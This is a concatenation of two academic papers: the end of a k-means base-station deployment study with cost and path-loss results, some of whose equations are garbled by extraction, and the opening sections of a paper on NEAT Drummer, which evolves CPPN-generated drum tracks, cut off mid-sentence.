coverage direction of butterfly station is not considered for the moment.  Microwave connection is adopted between the host stations, and the maximum communication distance is 50km.  Wireless return connection is adopted between host station and sub-station and between sub- stations.  Each sub-station can only have two wireless back links at most.  Any sub-station can only belong to one host station, and there is only one path to the host station, and the number of hops contained in the path is less than or equal to 3.  Any host station has and only one satellite responsible for the back transmission. Host stations connected by slices can share the same satellite, but a satellite can only bear the back data of eight host stations at most.  In a monolithic host station, there is no upper limit for the total number of host stations, i.e., the constraint conditions are as follows: International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 65                       )8/( 3)()( 2 )()( 50)()( )(12 )(6 10 20 . XCeilZ XJSY Y YWBLY KMXWLX YFX YRX ND FD TS ii WBL ji ji i i  c) Establishment of the model Based on the above analysis, a lower overall cost model with the highest priority is established as follows: 50510M  ZYXinC                      )8/( 3)()( 2 )()( 50)()( )(12 )(6 10 20 . XCeilZ XJSY Y YWBLY KMXWLX YFX YRX ND FD TS ii WBL ji ji i i III. K-MEANS ALGORITHM Clustering analysis is an important analysis method in data mining. Its goal is to divide the data set into several clusters, so that the similarity of data points within the same cluster is as large as possible, while the similarity of data points between different clusters is as small as possible. The study of Clustering Algorithms has a long history. Hartigan systematically discussed Clustering Algorithms in his monograph Clustering Algorithms as early as 1975. Since then, the academic circle has proposed a variety of clustering algorithms based on different ideas, mainly including the algorithm based on partition, the algorithm based on hierarchy, the algorithm based on density, the algorithm based on grid and the algorithm based on model. All these algorithms can achieve good clustering effect, among which the k-means algorithm based on partition is the one that is applied most and has a simple algorithm idea. By dealing with the difficult constraints, k-means algorithm makes the solution of the problem relatively easy. The algorithm has a good convergence, and the solution speed of the algorithm can also meet the requirements of real-time. A. Processing flow of k-means algorithm: 1) For a randomly given set of 1000 sites, the samples are divided into K clusters according to the size of the distance between sites. Suppose the cluster is divided into ( 1 B , 2 B ,... k B ), then our goal is to minimize the squared error E:  2 2 1     k i Bx i i XE    Where i is the mean vector of cluster iB , called the center of mass, and the expression is:      iBxi i X B 1    A suitable K value range of 10~25 was selected through cross validation. That is, k samples are randomly selected from 100 data sets as the initial k centroid vectors: { 1  , 2  ,... k  ,}. 2) Take N as the maximum number of iterations. For N =1,2,3... N. a) Classify the cluster B and initialize it as  t B t=1,2... K; b) For I =1,2... M, calculate sample ix and each centroid vector 1 (j=1,2... K) distance from: 2 2 jiij Xd  , mark ix with the smallest ijd as the corresponding category i , and then update   i XBB ii   ; c) For j = 1, 2,... K, recalculate the new center of mass    jBxj j X B 1  for all the sample points in jB ; d) If all k centroid vectors do not change, go to step (3). 3) Output cluster division  kCCCC ,..., 21 . IV. SIMULATION EXPERIMENT A. Cost modeling experiment The specific steps for solving the model are as follows: International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 66 Step1: use k-means algorithm to conduct data aggregation and violent calculation on difficult constraints, and obtain the upper bound of the original problem and the next one, that is, the solution without considering other constraints will make the overall cost the lowest; Step2: by solving the lower overall cost model with the highest priority, k-means algorithm is used again to conduct data aggregation for the classified subregions, and considering the solutions of other constraints, the number of host stations in each subregion is obtained; Step3: if the obtained solution satisfies the optimal solution of the condition, stop the algorithm, add the number in each cell, and the obtained solution is the optimal solution of the problem, otherwise go to Step2. Obtain the topology structure satisfying the constraint conditions through Step3. Take k=20 and the adjustable radius of the cell is 20km as an example, as shown in Figure 2. In the figure, the green "o" represents the host station, the blue "*" represents the substation, and the black line segment represents the connection relationship between stations. Figure 2. Base station topology Step4: obtain the minimum cost result output through the overall cost formula for the optimal solution obtained in each subregion. Get the result of the lowest cost through Step4. Take k=20 as an example, and the results are shown in figure 5-6. The number of host stations is 222, the number of sub stations is 778 and the number of satellites is 28. The total cost is 7510 (WUSD) and the average cost is 7.5100 (W USD). The efficiency of the algorithm is less than 2 minutes, with strong convergence. Figure 3. Program run result By contrast the chosen radii are 20, 25, and 30. Get the corresponding site distribution, number and total cost. See table 3. TABLE III. COST COMPARISON TABLE Radius(km) Host station child station satellite Overall cost(W USD) 20 222 778 28 7510 25 136 858 17 6500 30 110 871 14 6155 By comparison, when the cell radius is 30, the overall cost is the lowest. The minimum cost is 6155 (W USD). The larger the radius is, the more points of untreated stations are. However, even if the radius is 30, there are no 6 stations connected by leakage, which can be ignored. B. Path loss modeling experiment According to the simulation result of cost, the connection relation and physical location between host station and sub station are obtained. If only the path loss of the back transmission part of the sub-station is taken into account, and the path loss between the host stations is not taken into account, it only needs to meet the distance limit, and a smaller path loss can be achieved by increasing the number of host stations. When X is the maximum, PL is the minimum, but it also increases the cost required by satellite transmission. If the first and second hop distances are limited, that is, the distance between the sub-station and the host station and between sub-stations is reduced to obtain a lower path loss. If there is only a level 1 sub-station, the number of sub-stations in a International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 67 single sector of the host station is required to be less than or equal to 4, and then the modified sub-station model is deduced in reverse. Finally, the scheme with the lowest cost is selected, that is, the optimal solution to the problem. Although there is an influence of non-line-of-sight transmission capability (NLOS) in wireless return transmission, in order to simplify the problem, the free- space transmission model is adopted to estimate the path loss between stations. The formula is as follows:  )lg(20)lg(205.32 FDPL    Where, PL is the path loss and the distance between the two stations, D is km, F is the transmission frequency and the unit is MHz, 900MHz is adopted by default here. The average system cost in APL is equal to the sum of the losses of all wireless back links/the number of wireless back links It should be noted that the path loss only considers the return part of the sub-stations, and the microwave transmission is adopted between the host stations. The loss is not calculated as long as the distance limit is satisfied. By comparison, the first jump/second jump distance combinations were selected as 20/10, 15/8 and 12/6, respectively. Get the corresponding number of sites and average loss. See table 4. TABLE IV. NUMBER OF SITES AND AVERAGE WASTAGE First jump/second jump Host station child station satellite Average loss (dB) 20/10 222 778 28 111.79 15/8 385 610 49 109.44 12/6 588 410 74 107.30 Reducing the distance between the first jump and the second jump can reduce the average loss, so the 12/6 jump scheme is the best choice. However, the number of sites not connected to the topology increases, the signal coverage decreases, and the cost is very high. To sum up, if only the cost is considered, the best solution is that when the adjustable constraint radius is 30km, the overall cost is the lowest, and the lowest cost is 6155 (W USD). If only loss is considered, k=30, the first jump distance 12km and the second jump distance 6km are selected as the best scheme. V. SUMMARY In this paper, in the process of achieving the goal, a local optimal model based on k-means algorithm is constructed. By traversal comparison of the site deployment of host station and sub-station under the global large clustering and local small clustering, the lowest cost sub-station scheme is screened out. The establishment of the model adopts the idea of "dividing the whole into zero" and applies the k-means algorithm. Due to the scalability and high efficiency of the algorithm itself, it can simply and quickly divide 1000 candidate sites into K parts for step-by-step solution, which significantly reduces the amount of calculation and improves the speed of operation. However, because the k value is predetermined, the selection of this k value is very difficult to estimate, and the one- time optimal programming cannot be realized. In addition, due to the clustering division of the overall site, the final solution of the model is always locally optimal, which may be slightly different from the overall optimal solution. Therefore, the initial value of k is limited in the modeling process. Let k be between 15 and 25, and solve different k values for many times, so as to obtain the relative optimal solution by comparison. After getting the lower cost of the substation scheme, considering the return path loss of the substation, the established local optimal model is modified from the perspective of reducing the loss. Considering the results, microwave connection is adopted between the host stations and no loss is calculated. The average loss of the system is related to the wireless return distance, so the algorithm efficiency is significantly improved by limiting the distance between stations. However, the limitation of this model lies in the increase of host station and the increase of overall cost. Although it is beneficial to the service quality of users, it increases the cycle of investment return, which is not in line with the original intention of operators. In order to take into account the interests of operators, follow-up can be adjusted according to the situation. REFERENCES [1] Ma Liang . Wireless Relay transmission technology in the micro base station deployment strategy [J]. Journal of mobile communications, 2017, 41 (24) : 13 to 18. [2] Li xin, peng xiongen. Deployment and application of Relay technology in LTE network [J]. Mobile communications, 2016,40(11):32-35. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 68 [3] Deng shuifa. Research on LOS/NLOS communication environment identification and NLOS error elimination technology [D]. Southwest jiaotong university,2016. [4] Wang bo. Wideband lineless communication system in NLOS field scene without apparent distance [J]. Digital communication world,2017(02):55-57. [5] Liu sen. Analysis on the return rate of investment in enterprise cloud computing information [J]. China science and technology BBS,2014(06):83-87. [6] Zhang yong-jun, yao zhi-cong, wang jing, li hua-hua. Capacitor voltage balance control strategy of a cascade h-bridge static reactive power generator [J]. Chinese journal of electrical engineering,2014,34(27):4621-4628. [7] Wu huayi, liu bo, li dajun, ling nanyan. Research review on topological relations of spatial objects [J]. Journal of wuhan university (information science edition),2014,39(11):1269-1276. [8] Shi langyu, ma ling. Application of Relay wireless back transmission technology in td-lte networking scheme [J]. Telecommunications engineering technology and standardization, 2017, 30(2):41-44. [9] Xie J y, gao h c. selection algorithm based on statistical correlation and k-means to distinguish gene subset [J]. Journal of software, 2014(9):2050-2075. (in Chinese) [10] Zuo l, he y g, li b, zhu y q, fang g f. research on path loss of passive uhf rfid system [J]. Acta phys. Sin,2013,62(14):150-157. (in Chinese) [11] Jia h J, ding s f, shi z z. approximate weighted kernel k-means algorithm for solving large-scale spectral clustering [J]. Journal of software, 2015, 26(11):2836-2846. (in Chinese ） work_oh4axyozfnapfjex2hkzg6cdwu ---- Exploiting Functional Relationships in Musical Composition Amy K. Hoover and Kenneth O. Stanley Evolutionary Complexity Research Group School of Electrical Engineering and Computer Science University of Central Florida Orlando, FL 32816-2362 USA {ahoover, kstanley}@eecs.ucf.edu http://eplex.cs.ucf.edu/neatmusic To appear in: Connection Science Special Issue on Music, Brain, & Cognition, Abington, UK: Taylor & Francis, 21:2, 227-251, June 2009. Abstract The ability of gifted composers such as Mozart to create complex mul- tipart musical compositions with relative ease suggests a highly efficient mechanism for generating multiple parts simultaneously. Computational models of human music composition can potentially shed light on how such rapid creativity is possible. This paper proposes such a model based on the idea that the multiple threads of a song are temporal patterns that are functionally related, which means that one instrument’s sequence is a function of another’s. This idea is implemented in a program called NEAT Drummer that interactively evolves a type of artificial neural net- work (ANN) called a Compositional Pattern Producing Network (CPPN), which represents the functional relationship between the instruments and drums. The main result is that richly textured drum tracks that tightly follow the structure of the original song are easily generated because of their functional relationship to it. Keywords: compositional pattern producing networks; CPPNs; computer- generated music; interactive evolutionary computation; IEC; NeuroEvo- lution of Augmenting Topologies 1 Introduction A most intriguing capability of human composers is that they can often quickly conceive multiple instrumental parts simultaneously during the creative process. 1 For example, Mozart could hear complex multipart pieces form “in his head,” suggesting a powerful creative mechanism for generating accompaniment (Rup- pel, 1998; Deutsch, 1965; Hymer, 1990). Relatedly, rock guitarists in jam ses- sions and jazz musicians can improvise together while simultaneously perfectly respecting the interdependencies of their separate parts (Barrett, 1998; Berliner, 1994; Katz and Longden, 1983; Oliver, 2006; Schuller, 1968; Weick, 1998). Thus although intuition may suggest that complex interdependent construc- tions should require care and labor to devise, in fact such constructions in music appear almost effortless. Thus it is likely that no explicit serial reasoning is in- volved in the creative construction of accompanying instrumental tracks. What kind of mechanism then is responsible for such a capability? This paper suggests a possible high-level answer to this question. The key idea is that different instrumental parts are functionally related, which means that one can be expressed as a function of another. Furthermore, although we may perceive the interplay between two or more simultaneous instruments as rich and complex, in fact the function that relates one to the other can be quite simple. Thus, in this view, once a single track such as a melody is created, it can serve as a scaffold, i.e. an existing support structure, upon which other tracks are generated. In this way, while composers may seem to improvise entire harmonies and drum tracks one note at a time, fundamentally they need only construct a simple function for each part that transforms the scaffold. In fact, because the scaffold already in effect embodies the intrinsic con- tours and complexities of the song, any transformation of the scaffold inherits these features and thereby embodies the same thematic elements automatically. Thus the space of possible transforming functions is highly forgiving, in part explaining why improvising accompaniment can appear effortless. As long as the accompaniment is expressed as a function of the scaffold, it is difficult to go significantly wrong. While this idea of functions relating one pattern to another is difficult (though not necessarily impossible) to confirm at a neurological level, it does suggest a promising model for computer-generated music. This paper describes the implementation of such a model and presents its results. The goal is to gen- erate drum tracks to accompany existing songs. Because rhythm is simpler than melody or harmony, rhythm generation is an appealing stepping stone to full blown harmonization. It effectively highlights the advantages of the functional perspective in clear and simple terms that do not require musical expertise to appreciate. Formally, an appealing drum pattern for a particular piece over time can be described as a function of time, f (t). However, a good pattern for a particular drum may be highly complex with respect to t, making its discovery prohibitive. Yet given an existing part p(t) (i.e. the scaffold) that varies over time, it is likely significantly easier to discover the pattern g(p(t)) rather than f (t) even though they produce the same pattern. In effect, p makes discovering the accompanying pattern easy because it provides the scaffold, thereby allowing the composer to focus only on devising the much simpler g(p(t)). This idea is implemented in this paper in a program called NEAT Drummer, 2 which automatically generates drum tracks for existing songs. It accepts existing human compositions as input to a type of artificial neural network (ANN) called a Compositional Pattern Producing Network (CPPN; Stanley 2007) and outputs drum patterns to accompany the instruments. The inputs to NEAT Drummer are specific parts of a Musical Instrument Digital Interface (MIDI) file (e.g. the lead guitar, bass guitar, and vocals) and the outputs are drum tracks that are played along with the original MIDI file. That way, outputs are a function of the original MIDI file inputs, forcing synchronization with the MIDI. To take into account the user’s own inclinations, NEAT Drummer allows the user to interactively evolve rhythms from an initial population of drum tracks with the NeuroEvolution of Augmenting Topologies (NEAT) algorithm (Stanley and Miikkulainen, 2002, 2004), which can evolve increasingly complex CPPN-encoded patterns. The main results are drum tracks for existing songs that tightly follow the contours and idiosyncrasies of individual pieces, yet elaborate and elucidate them in creative and unexpected ways. Even when major transitions occur, because the drum tracks are a function of the music, the drums perfectly follow the transitions. This functional model of musical composition is then further extended to allow human users to add their own functional influences to create variational motifs outside the confines of the provided song. For example, users can provide a monotonically increasing function (i.e. time), which suggests change over time even if the underlying scaffold is repetitive. The result is that the drum track can be made to vary exactly as the user requests, while still seamlessly interweaving with the song. These user-provided functions are called conductors in a loose analogy with orchestral conductors, who describe functional contours with their hands that the orchestra follows. The conductors further highlight the simplicity and relative ease of creating subtle overlapping textures through simple functional relationships. To highlight the importance of scaffolding and conductors, several variants of NEAT Drummer without such facilities are compared with NEAT Drummer with its full functionality intact. The result is that the consequent capabilities are significantly impoverished, demonstrating the critical role that scaffolding plays in generating accompaniment. While the main contribution is a powerful new approach to computer-aided musical creativity, the high-level implication for improvisational accompaniment provides an intriguing clue to how such mechanisms may work in the brain. The next section provides background for the approach introduced in this paper. This approach is then described in Section 3 and the experimental design is explained in Section 4. Results are disclosed in Sections 5 and 6, and discussed in Section 7. 3 2 Background This section first explains interactive evolutionary computation (IEC), which is part of the NEAT Drummer approach, and its application to computer- generated music. The section concludes with a review of the NEAT method. 2.1 Interactive Evolutionary Computation NEAT Drummer refines its original drum patterns through a process called interactive evolutionary computation (IEC), which means a human, rather than a predefined fitness function, selects the parents of the next generation (Takagi, 2001). IEC implementations typically generate a random initial population. The user then selects the most fit individuals from that population to reproduce, resulting in increasingly complex individuals. IEC addresses the problem that objective evaluation is difficult in aesthetic or subjective domains such as art and music. By shifting the burden of evalua- tion to the human, the need to formalize subjective quality is avoided. Richard Dawkins first popularized IEC with Biomorphs, a visual representation of arti- ficial organisms designed to illustrate evolutionary principles (Dawkins, 1986). Biomorphs inspired a proliferation of programs tackling design problems from tool creation (Sato and Hagiwara, 1999) and suspension bridges (Furuta et al., 1995) to education, teaching, and story composition (Kuriyama and Terano, 1997). Because it can harness subjective preferences, a major application of IEC is art. The power of this approach is evident in visual domains like the L- system-encoded Mutator (Lindenmayer, 1968; Todd and Latham, 1992), Karl Sims’ genetic art (Sims, 1991), and Picbreeder (Secretan et al., 2008), a website where users evolve, save, and publish images. Picbreeder evolves its images with NEAT (Section 2.3), the same evolutionary algorithm used by NEAT Drummer. IEC has also branched into musical evolution, such as the Biomorphs-inspired Sonomorphs (Nelson, 1993).The next section reviews several such approaches to computer-generated music, which are often based on IEC. 2.2 Evolutionary Computer Generated Music The idea that computers might be able to compose music has inspired a diversity of approaches. While this section focuses mainly on evolutionary approaches, a broad review of the area can be found in de Mantaras and Arcos (2002). Often computer generated music utilizes IEC to leverage the subjective capabilities of average human subjects while avoiding the need for musical expertise. For example, among the first IEC music applications is Sonomorphs (Nelson, 1993), which encodes rhythms as bit strings in which a note is either on or off. Direct representation of this type, wherein each note is represented by a single gene, does not attempt to model how humans encode music neurologically. However, the creative evolutionary process is a metaphor for human composition through variation and refinement. 4 Listeners often feel that computer-generated music sounds artificial and uninspired. Music generators tend to either evolve a solution to fit a partic- ular a priori style or improvise pieces that often lack a global structure that holds together the entire song (McCormack, 2005; Husbands et al., 2007). It is common for music generators, such as Sonomorphs, CONGA (Tokui and Iba, 2000), GP-Music System (Johanson and Poli, 1998), and the GA- based IEC composition system of Onisawa et al. (Onisawa et al., 2000) to focus on composing short phrases rather than on entire songs (Nelson, 1993; Biles, 2007). These short phrases, which are selected and evolved by the user, may be extended through looping or manual juxtaposition, but the overall structure of the song is not itself generated. A notable example of computational improvisation is GenJam (Biles, 1999), which composes music in the style of jazz in cooperation with a human musi- cian. GenJam listens to human improvisations and interprets and genetically modifies the notes. GenJam can also evolve a soloist that is independent of any particular jazz composition by first training from human input. It integrates its improvisations seamlessly into a musical stream by prescripting when in the song improvisation may occur. In this way, it preserves the overall musical structure provided by the human, although it does not innovate at the level of global structure on its own. Early connectionist approaches, which also emphasize short phrases, repre- sent change over time through recurrence (Todd and Loy, 1991). Recurrence means that a network can represent a time series through a pattern of cycling activation. Todd and Loy (Todd and Loy, 1991) first applied recurrent ANNs to music generation by training them to reproduce patterns with Real-Time Recurrent Learning (RTRL). Chen and Miikkulainen (Chen and Miikkulainen, 2001) later combined this recurrent learning approach with evolution based on the idea that a simple recurrent network (SRN) can capture a general style of music and then vary it through evolution. This approach succeeded in produc- ing melodies in the style of Bela Bartok on a local level; however, even with recurrence it is difficult to capture global structure. NEAT Drummer approaches the problem of global structure by generating its rhythms from already-existing instrumental parts that span entire songs, thereby diminishing the need to represent patterns over time through recurrence. The next section describes the NEAT method that implements evolution in NEAT Drummer. 2.3 NeuroEvolution of Augmenting Topologies (NEAT) and CPPNs NEAT Drummer follows the idea in prior connectionist approaches that an ANN can effectively represent music. Therefore, a method is needed to allow the user to evolve ANNs. The NEAT method, described in this section, is chosen for this purpose in NEAT drummer because it allows ANNs to increase in complexity over generations. In particular, NEAT Drummer evolves a neural- based encoding of drum patterns. 5 The NEAT method was originally developed to solve difficult control and sequential decision tasks. The ANNs evolved with NEAT control agents that select actions based on their sensory inputs. While previous methods that evolved ANNs, i.e. neuroevolution methods, evolved either fixed topology net- works (Gomez and Miikkulainen, 1999; Saravanan and Fogel, 1995), or arbitrary random-topology networks (Yao, 1999), NEAT is notable for beginning evolu- tion with a population of small, simple networks and complexifying the network topology over generations into diverse species, leading to increasingly sophisti- cated behavior. This section briefly reviews the NEAT method; Stanley and Miikkulainen (2002, 2004) provide complete introductions. NEAT is based on three key principles. First, to allow ANN structures to in- crease in complexity over generations, a method is needed to keep track of which gene is which; otherwise, it is not clear in later generations which individual is compatible with which, or how their genes should be combined to produce off- spring. NEAT solves this problem by assigning a unique historical marking to every new piece of network structure that appears through a structural muta- tion. The historical marking is a number assigned to each gene corresponding to its order of appearance over the course of evolution. The numbers are inherited during crossover unchanged, and allow NEAT to perform crossover without the need for expensive topological analysis. Second, NEAT traditionally speciates the population based on topological similarity so that individuals compete primarily within their own niches instead of with the population at large, which protects topological innovations. The historical markings allow structures to be compared for this purpose. However, because the user performs selection in interactive evolution instead of the evo- lutionary algorithm itself, speciation is not applicable in NEAT Drummer and therefore not utilized. Note that in Section 6, variants of regular non-interactive NEAT are compared to NEAT Drummer, and these variants therefore do im- plement speciation. Third, unlike other systems that evolve network topologies and weights (Yao, 1999), NEAT begins with a population of simple networks with no hidden nodes. New structure is introduced incrementally as structural mutations occur, and only those structures survive that are found to be useful through fitness evalua- tions. This way, NEAT searches through a minimal number of weight dimensions and finds the appropriate complexity level for the problem. NEAT Drummer lets the user evolve patterns of increasing complexity through this approach. Finally, in NEAT Drummer, NEAT evolves a kind of ANN called a Compo- sitional Pattern Producing Network (CPPN), which is designed to compactly represent patterns with regularities, such as pictures and songs (Stanley, 2006, 2007). What distinguishes CPPNs from ANNs is that in addition to traditional sigmoid functions, CPPN hidden nodes can include several classes of functions, including periodic functions (like sine) for repetition and symmetric functions (like Gaussian) for symmetry. An individual network can contain a heteroge- neous set of functions in its nodes, which are evolved along with the weights. To demonstrate the capabilities of such networks, Stanley (2006, 2007) showed how simple canonical functions can be composed to create an overall network 6 Figure 1: CPPN Inputs and Outputs The user selects both a set of inputs from among the channels in the MIDI file and a set of outputs corresponding to specific drums. that produces patterns with complex regularities and symmetries. Each com- ponent function creates a novel geometric coordinate frame within which other functions can reside. The idea in NEAT Drummer is that this representation allows drum tracks with regular patterns to be discovered quickly and easily. The next section explains how CPPNs are evolved in NEAT Drummer to produce rhythms. 3 The NEAT Drummer Approach The main idea in NEAT Drummer is that the temporal patterns of the instru- mental parts of a song can be inherited by the drums by making the drums a function of the other instruments. This section begins by explaining how CPPNs encode rhythm and then details how they are evolved interactively. 3.1 CPPN Rhythm Generation NEAT Drummer begins by generating an initial set of original drum tracks for a provided song. To initiate this first generation, the user must first specify the inputs and outputs of the CPPN (figure 1) through a graphical user interface (GUI) provided by the program (figure 2). The inputs are individual instrumental tracks from the chosen song and the outputs are a set of drums that together produce the entire drum accompani- ment. From the inputs the CPPN derives its original patterns, which are therefore functions of the original song (i.e. the scaffold) and its structure. In other words, NEAT Drummer generates a rhythm that is a function of these inputs. Thus, it is important to choose instruments that play salient motifs in the song so that the drum pattern can be derived from the richest structures available. Further texture can be achieved by inputting more than one MIDI channel, e.g. bass and guitar. Thus the user selects any combination of channels representing individual instrumental parts from a MIDI file to be input into the CPPN. In this way, 7 Figure 2: NEAT Drummer Screenshot NEAT drummer presents an IEC interface where visual representations of drum patterns help the user to de- cide whether to listen to each candidate and then select their favorites. This approach, i.e. choosing inputs and outputs and selecting favorites, is designed to allow users to evolve compelling drum tracks without the need for musical expertise. 8 NEAT Drummer generates rhythms from any MIDI file. The user also chooses the percussion instruments that will play the rhythm. Each such instrument is represented by a single output on the CPPN. For ex- ample, one output may be a bass drum, one a snare, and the final a hi-hat. Any number of drums, and hence any number of outputs, are permissible. To produce the initial patterns, a set of random initial CPPNs with a min- imal initial topology (following the NEAT approach) and the chosen inputs and outputs are generated. The number of inputs in these initial topologies corresponds to the number of instrument channels in the scaffold (e.g. guitar, bass, etc.) plus a bias node. The relationship between the initial topology and the original song is thus established through these inputs, which feed informa- tion from the scaffold directly into the network. The number of outputs equals the number of drums in the drum ensemble. The initial minimal topology has random connectivity yet always contains exactly one hidden node. This single hidden node ensures that initial patterns sound more interesting than percep- trons, but are still relatively simple. Note that the internal topology is thus unrelated to the scaffold except insofar as it is affected by the number of inputs. Thus the apparent “knowledge” of the provided song in the pattern output by the network is entirely a result of computing a function of the scaffold. NEAT Drummer then inputs the selected channels into the CPPN over the course of the song in sequential order and records the consequent outputs, which represent drums being struck. Specifically, from time t = 0 to t = l, where l is the length of the song, the inputs are provided and outputs of the CPPN are sampled at discrete subintervals (i.e. ticks) up to l. Individual notes input into the CPPN from selected MIDI channels are rep- resented over time as spikes that begin high and decrease (i.e. decay) linearly (figure 3). The period of decay is equivalent to the duration of the note. That way, the CPPN “hears” the timing information from the supplied channels while in effect ignoring pitch, which is unnecessary to appreciate rhythm. By allowing the spikes to decay over their duration, each note becomes a kind of temporal coordinate frame. That is, the CPPN in effect knows at any time where it is within the duration of a note by observing the stage of its decay. That in- formation allows it to create drum patterns that vary over the course of each note. Interestingly, it is potentially useful also to input temporal patterns that are not part of the song itself. Such patterns can provide additional structure to the drums by situating them within coordinate frames that describe how the user wants the song to vary at a meta-level. For example, inputting a simple linear function of time that indicates the position-in-song at each tick (figure 4a) in addition to the instrument channels means that the output is a function of both the song itself and the position-in-song. That way, the CPPN can produce a drum track that shifts gradually from one motif to another over the course of the song. Similarly, by inputting position-in-measure (figure 4b) or position-in-beat (figure 4c), the user can bias the output towards progressions across each mea- sure or beat. 9 Figure 3: Channel Input Encoding. Regardless of the instrument, each note in a sequence in any channel input to the CPPN is encoded as a spike that decays over the duration of note. The pattern depicted in this figure shows how quarter notes decay faster than half notes, thereby conveying timing information to the CPPN, which samples this pattern at discrete ticks. The variable-intensity row of boxes under the spikes depicts the intensity of the spike sampled at discrete time steps (i.e. four per quarter note). The intensity at each timestep is represented by the darkness in its respective column, which indicates how the input channel “sounds” to the CPPN at that moment. In this paper, these additional inputs are called conductors to make a metaphor with the silent patterns expressed to an orchestra by its conductor. Additional inputs that represent desired hidden contours beyond the pattern of the in- struments themselves give the user an unprecedented level of control over the nuances of the global output pattern. In fact, any arbitrary sequence can be input as a conductor, which in effect simply means a set of note spikes that are never actually heard. Thus the pattern in figure 3, while introduced as an instrumental pattern, could also be a complex conductor pattern that suggests a particular underlying motif that the drums should elaborate. Note that in NEAT Drummer, by convention, conductor inputs that represent time are spikes that start low and attack, which conveys the idea of a timing signal, as opposed to notes from scaffolding inputs, which are decaying spikes. Unlike CPPN inputs, the level of each CPPN output is interpreted as the volume (i.e. strength) of each drum strike. That way, NEAT Drummer can produce highly nuanced effects through varying softness. Two consecutive drum strikes one tick after another are interpreted as two separate drum strikes (as opposed to one long strike). To produce a pause between strikes, the CPPN must output an inaudible value for some number of intervening ticks. Because the CPPN has one output for each drum, the end result of activating the network over t ticks is a drum sequence for each drum in the ensemble. An interesting aspect of this representation is that it does not make explicit use of recurrent connections. While recurrent networks are often noted for their ability to encode temporal patterns (Dolson, 1989; Todd and Latham, 1999; 10 (a) Position-in-Song (b) Position-in-Measure (c) Position-in-Beat Figure 4: Potential NEAT Drummer Conductor Inputs. Each figure depicts four measures of a conductor, which is a temporal coordinate frame optionally provided by the user to provide additional structure to the song. The simplest conductor (a) represents the current position in the song, suggesting a smooth transition across the entire song. Position-in-measure (b) allows the CPPN to know at every moment where it is within the current measure, which allows it to improvise patterns within measures and “understand” the measure structure of the song. Similarly, the time within each four-tick beat can be input as well (c). Conductors offer the user a subtle yet powerful means to influence the overall structure of the rhythm without the need for note-by-note specification. 11 Chen and Miikkulainen, 2001), it is easier to simply express music as a function of an existing temporal pattern (i.e. the melody and harmony) and thereby affix one pattern to another without needing to learn the temporal synchronization itself. Thus, while recurrence is well suited to temporal problems in which the inputs are not known a priori, because music is deterministic, recurrence is unnecessary; because the inputs are always the same, the outputs can simply be expressed as a function of the inputs. Thus the CPPN can potentially represent that function without recurrence. NEAT Drummer generates each of the individuals in the initial population with the same set of inputs and outputs. However, the initial CPPN weights and activation functions for each member of the population are decided randomly. In particular, every input is connected to every output with a randomized weight within [ − 2, 2]. The activation function of each node is assigned randomly from among the following options: sigmoid, binary threshold, Gaussian, linear, mul- tiplication, and sine. To encourage interesting patterns in the initial generation, a single hidden node with a random activation function is also connected into the network by splitting a randomly chosen connection. Each song is divided into ticks (four per beat). At each tick, the vector of note spike values at that discrete moment of time for all the instruments is input. The CPPN is fully ac- tivated and the value of each drum output is recorded so that all the generated drum tracks can be visualized or played instantaneously to facilitate interactive evolution, as explained in the next section. 3.2 Drum Pattern Interactive Evolution As shown in figure 2, NEAT Drummer displays the set of candidate patterns visually after they are generated. It is important to note that unlike in many evolutionary experiments, pat- terns in the initial generation already sound appropriate. This initial high qual- ity underscores the contribution of the scaffold (i.e. the existing tracks) to the structure of the generated patterns. Thus many appealing patterns already exist in the first generation, demonstrating how quickly appropriate accompaniment can be generated as a function of the source channels. In this way, a major contribution of this research is in showing how rich context can be leveraged by a connectionist system to successfully constrain output to appropriate patterns. The aim of evolution is thus to elaborate on such patterns. The user can choose to listen to any displayed pattern. When listening, the user can listen to the drum track alone or the drum track with its associated song. The visual presentation allows the user to quickly identify unappealing patterns without wasting time listening to them (e.g. wherein the bass is hit over and over again without pause). Then either the user rates the individual patterns from which NEAT Drum- mer chooses parents or the user selects a single parent of the next generation. Further rounds of selecting and breeding continue until the user is satisfied. In this way, drum tracks evolve interactively. Because of complexification in NEAT, they can become increasingly elaborate as evolution progresses. 12 To encourage rapid elaboration over generations, the probability of adding a connection or node in NEAT was 90%. While this high probability would be deleterious in typical NEAT experiments (Stanley and Miikkulainen, 2002, 2004), because drum tracks tend to follow song structure, this domain supports adding structure quickly. The mutation power, i.e. the maximum magnitude of weight change, was 0.1 and the probability of mutating the weight of an individual connection was 90%. Finally, it is also important to note that in principle, the idea of representing musical structure in a connectionist system through scaffolding and conductors could be combined with a different evolutionary algorithm, or even a different training mechanism. Thus while NEAT is a robust algorithm from which to demonstrate the power of scaffolding, the benefit of the scaffolding approach is likely compatible with other connectionist training approaches as well. 3.3 Musical Instrument Digital Interface NEAT Drummer reads its input channels from Musical Instrument Digital In- terface (MIDI) files. Standard MIDI format (SMF) is the most common MIDI filetype. SMF format includes any number of tracks, each of which contains a sequence of instrumental events that occur in up to 16 channels. Each channel contains events that tell a particular instrument when and how loudly to play. According to the specification, most of the instrument sounds can occur in any of the 16 channels with the exception of percussion, for which channel 10 is reserved. NEAT Drummer can input any combination of the 16 channels into the CPPN. That is, given a MIDI song, NEAT Drummer generates a drum pattern as a function of any subset of the preexisting bass, guitar, vocals, etc. The resulting drum patterns are all explicitly functions of the inputs, so if part of a MIDI is input to the ANN, the percussion follows the structure of that part. In this way, NEAT Drummer can generate percussion for MIDI songs based on any subset of the preexisting instrument parts. 4 Experimental Design This paper includes two sets of experiments. The first set focuses on the ca- pability of the scaffolding approach to generate drum tracks. The second set compares several other approaches with the scaffolding approach, both interac- tive and supervised, to provide an objective validation of the methodology. Also, because music appreciation is largely subjective and auditory, the re- sults of NEAT Drummer should be judged in part on that basis. Therefore, MIDI files for every experiment reported in this paper are available online at http://eplex.cs.ucf.edu/neatmusic/. We invite readers to listen to the recordings and judge the natural quality of the percussion tracks discussed in Sections 5 and 6. 13 4.1 Testing Scaffolding The first set of experiments aim to determine whether drum tracks generated for particular songs are appropriate and nontrivial. The hope is that they respect the structure and transitions of the song yet do not mimic its instruments superficially. Such sophisticated correspondence can confirm the capacity of functional relationships to generate plausible, human-like accompaniment. Specifically, the first two experiments in this set investigate what happens when salient instrument channels are input alone to the CPPN, which generates drum tracks for the folk songs Johnny Cope and Oh! 